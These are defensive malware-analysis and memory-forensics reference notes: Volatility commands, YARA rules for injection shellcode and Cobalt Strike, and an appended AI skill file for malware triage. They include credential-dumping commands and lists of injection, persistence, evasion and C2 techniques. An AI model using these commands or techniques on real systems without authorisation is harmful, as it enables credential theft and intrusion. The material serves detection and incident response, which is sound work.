#define PAGE_EXECUTE_READWRITE 0x40
#define PAGE_EXECUTE_WRITECOPY 0x80
```
## Detection Patterns
### Process Injection Indicators
```python
# Malfind indicators
# - PAGE_EXECUTE_READWRITE protection (suspicious)
# - MZ header in non-image VAD region
# - Shellcode patterns at allocation start
# Common injection techniques
# 1. Classic DLL Injection
# - VirtualAllocEx + WriteProcessMemory + CreateRemoteThread
# 2. Process Hollowing
# - CreateProcess (SUSPENDED) + NtUnmapViewOfSection + WriteProcessMemory
# 3. APC Injection
# - QueueUserAPC targeting alertable threads
# 4. Thread Execution Hijacking
# - SuspendThread + SetThreadContext + ResumeThread
```
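The malfind indicators listed above can be expressed as a small triage function over a memory region's metadata. This is a minimal sketch that assumes the caller already has the region's protection constant, whether it is image-backed, and its first bytes. The `injection_indicators` name, its parameters, and the choice of the `55 8B EC` prologue as the only shellcode pattern are illustrative assumptions, not how the malfind plugin is implemented.

```python
PAGE_EXECUTE_READWRITE = 0x40

# x86 "push ebp; mov ebp, esp" prologue, used here as one example pattern.
FUNCTION_PROLOGUE = b"\x55\x8b\xec"


def injection_indicators(protection, image_backed, head):
    """Return the list of indicators that apply to one memory region.

    protection   -- Win32 PAGE_* protection constant for the region
    image_backed -- True if the region maps an executable image from disk
    head         -- the first bytes of the region
    """
    findings = []
    if protection == PAGE_EXECUTE_READWRITE:
        findings.append("rwx-protection")
    if not image_backed and head[:2] == b"MZ":
        findings.append("mz-in-non-image-region")
    if head[:3] == FUNCTION_PROLOGUE:
        findings.append("prologue-at-allocation-start")
    return findings


if __name__ == "__main__":
    print(injection_indicators(0x40, False, b"MZ\x90\x00"))
```

Each indicator on its own also occurs in benign software (JIT compilers commonly allocate RWX memory), so the result is a prompt for closer inspection rather than a verdict.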
### Rootkit Detection
```bash
# Compare process lists to spot DKOM (Direct Kernel Object Manipulation) unlinking
vol -f memory.raw windows.pslist > pslist.txt
vol -f memory.raw windows.psscan > psscan.txt
diff pslist.txt psscan.txt # Entries only in psscan may be hidden or already-exited processes
# Inspect kernel notification callbacks registered by drivers
vol -f memory.raw windows.callbacks
# Detect hooked functions
vol -f memory.raw windows.ssdt # System Service Descriptor Table
# Driver analysis
vol -f memory.raw windows.driverscan
vol -f memory.raw windows.driverirp
```
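A plain `diff` of the two process listings tends to be noisy, because the plugins order rows differently and print different columns. Comparing only the PIDs is usually easier to read. The sketch below assumes the default text output is tab-separated with a header row containing `PID` and `ImageFileName`; that layout is an assumption about the renderer and should be checked against the installed Volatility version. The function names are hypothetical.

```python
def pids_from_output(text):
    """Map PID -> image name from tab-separated plugin output with a header row."""
    processes = {}
    pid_col = None
    name_col = None
    for line in text.splitlines():
        fields = line.split("\t")
        if pid_col is None:
            # Skip the banner and blank lines until the header row appears.
            if "PID" in fields:
                pid_col = fields.index("PID")
                if "ImageFileName" in fields:
                    name_col = fields.index("ImageFileName")
            continue
        if len(fields) <= pid_col or not fields[pid_col].strip().isdigit():
            continue
        name = ""
        if name_col is not None and len(fields) > name_col:
            name = fields[name_col].strip()
        processes[int(fields[pid_col])] = name
    return processes


def only_in_psscan(pslist_text, psscan_text):
    """Return processes that psscan found but pslist did not list."""
    listed = pids_from_output(pslist_text)
    scanned = pids_from_output(psscan_text)
    return {pid: name for pid, name in scanned.items() if pid not in listed}


if __name__ == "__main__":
    with open("pslist.txt", encoding="utf-8") as a, open("psscan.txt", encoding="utf-8") as b:
        for pid, name in sorted(only_in_psscan(a.read(), b.read()).items()):
            print(pid, name)
```

Processes that appear only in the scan are candidates for review: they may have been unlinked from the active process list, or they may simply have exited before acquisition.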
### Credential Extraction
```bash
# Dump local account hashes (Volatility 3 locates the SAM and SYSTEM hives itself)
vol -f memory.raw windows.hashdump
# LSA secrets
vol -f memory.raw windows.lsadump
# Cached domain credentials
vol -f memory.raw windows.cachedump
# Mimikatz-style extraction
# Requires specific plugins/tools
```
## YARA Integration
### Writing Memory YARA Rules
```yara
rule Suspicious_Injection
{
meta:
description = "Detects common injection shellcode"
strings:
// Common shellcode patterns
$mz = { 4D 5A }
$shellcode1 = { 55 8B EC 83 EC } // Function prologue
$api_hash = { 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 } // Push hash, call
condition:
$mz at 0 or any of ($shellcode*) or $api_hash
}
rule Cobalt_Strike_Beacon
{
meta:
description = "Detects Cobalt Strike beacon in memory"
strings:
$config = { 00 01 00 01 00 02 }
$sleep = "sleeptime"
$beacon = "%s (admin)" wide
condition:
2 of them
}
```
### Scanning Memory
```bash
# Scan all process memory (VAD regions)
vol -f memory.raw windows.vadyarascan --yara-file rules.yar
# Scan specific process
vol -f memory.raw windows.vadyarascan --yara-file rules.yar --pid 1234
# Scan kernel memory
vol -f memory.raw yarascan.YaraScan --yara-file rules.yar
```
## String Analysis
### Extracting Strings
```bash
# Basic string extraction
strings -a memory.raw > all_strings.txt
# Unicode strings
strings -el memory.raw >> all_strings.txt
# Targeted extraction from process dump
vol -f memory.raw windows.memmap --pid 1234 --dump
strings -a pid.1234.dmp > process_strings.txt
# Pattern matching
grep -E "(https?://|[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})" all_strings.txt
```
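The `grep` pattern above also matches strings such as `999.1.2.3` that are not valid addresses. A short script can apply the same idea and validate each candidate. This is a minimal sketch using only the standard library; the regular expressions and the `extract_indicators` name are illustrative choices, and the input file name follows the `all_strings.txt` used above.

```python
import ipaddress
import re

URL_RE = re.compile(r"https?://[^\s\"'<>]+")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def extract_indicators(lines):
    """Return (sorted URLs, sorted valid IPv4 addresses) found in the given lines."""
    urls = set()
    addresses = set()
    for line in lines:
        urls.update(URL_RE.findall(line))
        for candidate in IPV4_RE.findall(line):
            try:
                # Rejects out-of-range octets such as 999.1.2.3.
                addresses.add(str(ipaddress.IPv4Address(candidate)))
            except ValueError:
                continue
    return sorted(urls), sorted(addresses)


if __name__ == "__main__":
    with open("all_strings.txt", encoding="utf-8", errors="replace") as handle:
        found_urls, found_ips = extract_indicators(handle)
    print("\n".join(found_urls + found_ips))
```

Version numbers such as `1.2.3.4` still pass validation, so the output needs a manual review before any address is treated as an indicator.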
### FLOSS for Obfuscated Strings
```bash
# FLOSS extracts obfuscated strings
floss malware.exe > floss_output.txt
# From memory dump
floss pid.1234.dmp
```
## Best Practices
### Acquisition Best Practices
1. **Minimize footprint**: Use lightweight acquisition tools
2. **Document everything**: Record time, tool, and hash of capture
3. **Verify integrity**: Hash memory dump immediately after capture
4. **Chain of custody**: Maintain proper forensic handling
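Items 2 and 3 above come down to computing a cryptographic hash of the dump right after capture and checking it again before analysis. The sketch below reads the file in chunks so that multi-gigabyte images do not have to fit in memory. The choice of SHA-256, the chunk size, and the function names are assumptions of this example.

```python
import hashlib


def sha256_file(path, chunk_size=1024 * 1024):
    """Return the SHA-256 hex digest of a file, read in fixed-size chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_dump(path, recorded_hex):
    """Compare the current hash of the dump with the value recorded at capture."""
    return sha256_file(path) == recorded_hex.strip().lower()


if __name__ == "__main__":
    print(sha256_file("memory.raw"))
```

Recording the digest alongside the capture time and tool name gives later analysts a way to confirm they are working on an unmodified copy.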
### Analysis Best Practices
1. **Start broad**: Get overview before deep diving
2. **Cross-reference**: Use multiple plugins for same data
3. **Timeline correlation**: Correlate memory findings with disk/network
4. **Document findings**: Keep detailed notes and screenshots
5. **Validate results**: Verify findings through multiple methods
### Common Pitfalls
- **Stale data**: Memory is volatile; acquire it as early as possible
- **Incomplete dumps**: Verify dump size matches expected RAM
- **Symbol issues**: Ensure correct symbol files for OS version
- **Smear**: Memory may change during acquisition
- **Encryption**: Some data may be encrypted in memory
---
name: malware-analyst
version: 1.0.0
description: "Expert malware analysis for defensive security research. Static and dynamic analysis, sandbox triage, IOC extraction, unpacking, and malware family identification. Covers string extraction, import analysis, behavioral analysis, and incident response workflows."
metadata:
model: opus
---
```bash
# File identification
file sample.exe
sha256sum sample.exe
# String extraction
strings -a sample.exe | head -100
floss sample.exe # Obfuscated strings
# Packer detection
diec sample.exe # Detect It Easy
exeinfope sample.exe
# Import analysis
rabin2 -i sample.exe
dumpbin /imports sample.exe
```
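On an analysis host without `strings`, the string-extraction step can be approximated in a few lines. The sketch below pulls printable ASCII runs (similar in spirit to `strings -a`) and UTF-16LE runs (similar to `strings -el`) from raw bytes. The minimum length of 4 and the function names are assumptions, and no decoding of obfuscated strings is attempted.

```python
import re

MIN_LEN = 4  # assumed minimum run length

ASCII_RE = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN)
UTF16LE_RE = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % MIN_LEN)


def ascii_strings(data):
    """Return printable ASCII runs of at least MIN_LEN characters."""
    return [match.decode("ascii") for match in ASCII_RE.findall(data)]


def utf16le_strings(data):
    """Return UTF-16LE runs of printable characters, as Windows binaries often store them."""
    return [match.decode("utf-16-le") for match in UTF16LE_RE.findall(data)]


if __name__ == "__main__":
    with open("sample.exe", "rb") as handle:
        blob = handle.read()
    for text in ascii_strings(blob)[:100]:
        print(text)
```

Reading the whole sample into memory is fine for typical executables; very large files would need a chunked approach instead.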
### Phase 3: Static Analysis
1. **Load in disassembler**: IDA Pro, Ghidra, or Binary Ninja
2. **Identify main functionality**: Entry point, WinMain, DllMain
3. **Map execution flow**: Key decision points, loops
4. **Identify capabilities**: Network, file, registry, process operations
5. **Extract IOCs**: C2 addresses, file paths, mutex names
### Phase 4: Dynamic Analysis
```
1. Environment Setup:
- Windows VM with common software installed
- Process Monitor, Wireshark, Regshot
- API Monitor or x64dbg with logging
- INetSim or FakeNet for network simulation
2. Execution:
- Start monitoring tools
- Execute sample
- Observe behavior for 5-10 minutes
- Trigger functionality (connect to network, etc.)
3. Documentation:
- Network connections attempted
- Files created/modified
- Registry changes
- Processes spawned
- Persistence mechanisms
```
## Use this skill when
- Working on malware analysis tasks or workflows
- Needing guidance, best practices, or checklists for malware analysis
## Do not use this skill when
- The task is unrelated to malware analysis
- You need a different domain or tool outside this scope
## Instructions
- Clarify goals, constraints, and required inputs.
- Apply relevant best practices and validate outcomes.
- Provide actionable steps and verification.
- If detailed examples are required, open `resources/implementation-playbook.md`.
## Common Malware Techniques
### Persistence Mechanisms
```
Registry Run keys - HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Scheduled tasks - schtasks, Task Scheduler
Services - CreateService, sc.exe
WMI subscriptions - Event subscriptions for execution
DLL hijacking - Plant DLLs in search path
COM hijacking - Registry CLSID modifications
Startup folder - %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
Boot records - MBR/VBR modification
```
### Evasion Techniques
```
Anti-VM - CPUID, registry checks, timing
Anti-debugging - IsDebuggerPresent, NtQueryInformationProcess
Anti-sandbox - Sleep acceleration detection, mouse movement
Packing - UPX, Themida, VMProtect, custom packers
Obfuscation - String encryption, control flow flattening
Process hollowing - Inject into legitimate process
Living-off-the-land - Use built-in tools (PowerShell, certutil)
```
### C2 Communication
```
HTTP/HTTPS - Web traffic to blend in
DNS tunneling - Data exfil via DNS queries
Domain generation - DGA for resilient C2
Fast flux - Rapidly changing DNS
Tor/I2P - Anonymity networks
Social media - Twitter, Pastebin as C2 channels
Cloud services - Legitimate services as C2
```
## Tool Proficiency
### Analysis Platforms
```
Cuckoo Sandbox - Open-source automated analysis
ANY.RUN - Interactive cloud sandbox
Hybrid Analysis - Free community sandbox service
Joe Sandbox - Enterprise sandbox solution
CAPE - Cuckoo fork with enhancements
```
### Monitoring Tools
```
Process Monitor - File, registry, process activity
Process Hacker - Advanced process management
Wireshark - Network packet capture
API Monitor - Win32 API call logging
Regshot - Registry change comparison
```
### Unpacking Tools
```
Unipacker - Automated unpacking framework
x64dbg + plugins - Scylla for IAT reconstruction
OllyDumpEx - Memory dump and rebuild
PE-sieve - Detect hollowed processes
UPX - For UPX-packed samples
```
## IOC Extraction
### Indicators to Extract
```yaml
Network:
- IP addresses (C2 servers)
- Domain names
- URLs
- User-Agent strings
- JA3/JA3S fingerprints
File System:
- File paths created
- File hashes (MD5, SHA1, SHA256)
- File names
- Mutex names
Registry:
- Registry keys modified
- Persistence locations
Process:
- Process names
- Command line arguments
- Injected processes
```
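Keeping extracted indicators in a structure that mirrors the four groups above makes them easier to hand to detection tooling. The sketch below is one possible container, not a standard format: the `IOCSet` class, its field names, and the `type`/`value` record shape are all assumptions made for illustration.

```python
import json
from dataclasses import asdict, dataclass, field, fields


@dataclass
class IOCSet:
    """Indicators grouped by the categories used in this section."""
    network: list = field(default_factory=list)
    file_system: list = field(default_factory=list)
    registry: list = field(default_factory=list)
    process: list = field(default_factory=list)

    def add(self, category, kind, value):
        """Record one indicator, for example add('network', 'domain', 'evil.example')."""
        valid = {f.name for f in fields(self)}
        if category not in valid:
            raise ValueError(f"unknown category: {category}")
        entry = {"type": kind, "value": value}
        bucket = getattr(self, category)
        if entry not in bucket:  # avoid duplicate records
            bucket.append(entry)

    def to_json(self):
        """Serialize all categories to a JSON document."""
        return json.dumps(asdict(self), indent=2, sort_keys=True)


if __name__ == "__main__":
    iocs = IOCSet()
    iocs.add("network", "domain", "evil.example")
    iocs.add("file_system", "mutex", "Global\\ExampleMutex")
    print(iocs.to_json())
```

Teams that already exchange indicators in an established schema would map these fields onto that schema instead of using this shape directly.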
### YARA Rules
```yara
rule Malware_Generic_Packer
{
meta:
description = "Detects common packer characteristics"
author = "Security Analyst"
strings:
$mz = { 4D 5A }
$upx = "UPX!" ascii
$section = ".packed" ascii
condition:
$mz at 0 and ($upx or $section)
}
```
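To make the rule's condition concrete, the same logic can be written as a plain byte check. This sketch only mirrors the condition `$mz at 0 and ($upx or $section)` for quick sanity tests on sample buffers; it is not a replacement for running YARA, and the function name is hypothetical.

```python
def matches_generic_packer(data: bytes) -> bool:
    """Mirror of the rule condition: MZ header at offset 0 plus a packer marker."""
    mz_at_start = data.startswith(b"MZ")   # $mz at 0
    has_upx = b"UPX!" in data              # $upx
    has_section = b".packed" in data       # $section
    return mz_at_start and (has_upx or has_section)


if __name__ == "__main__":
    with open("sample.exe", "rb") as handle:
        print(matches_generic_packer(handle.read()))
```

Writing the condition this way also shows its limits: any file that starts with `MZ` and happens to contain the text `UPX!` will match, whether or not it is actually packed.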
## Reporting Framework
### Analysis Report Structure
```markdown
# Malware Analysis Report
## Executive Summary
- Sample identification
- Key findings
- Threat level assessment
## Sample Information
- Hashes (MD5, SHA1, SHA256)
- File type and size
- Compilation timestamp
- Packer information
## Static Analysis
- Imports and exports
- Strings of interest
- Code analysis findings
## Dynamic Analysis
- Execution behavior
- Network activity
- Persistence mechanisms
- Evasion techniques
## Indicators of Compromise
- Network IOCs
- File system IOCs
- Registry IOCs
## Recommendations
- Detection rules
- Mitigation steps
- Remediation guidance
```
## Ethical Guidelines
### Appropriate Use
- Incident response and forensics
- Threat intelligence research
- Security product development
- Academic research
- CTF competitions
### Never Assist With
- Creating or distributing malware
- Attacking systems without authorization
- Evading security products maliciously
- Building botnets or C2 infrastructure
- Any offensive operations without proper authorization
## Response Approach
1. **Verify context**: Ensure defensive/authorized purpose
2. **Assess sample**: Quick triage to understand what we're dealing with
3. **Recommend approach**: Appropriate analysis methodology
4. **Guide analysis**: Step-by-step instructions with safety considerations
5. **Extract value**: IOCs, detection rules, understanding
6. **Document findings**: Clear reporting for stakeholders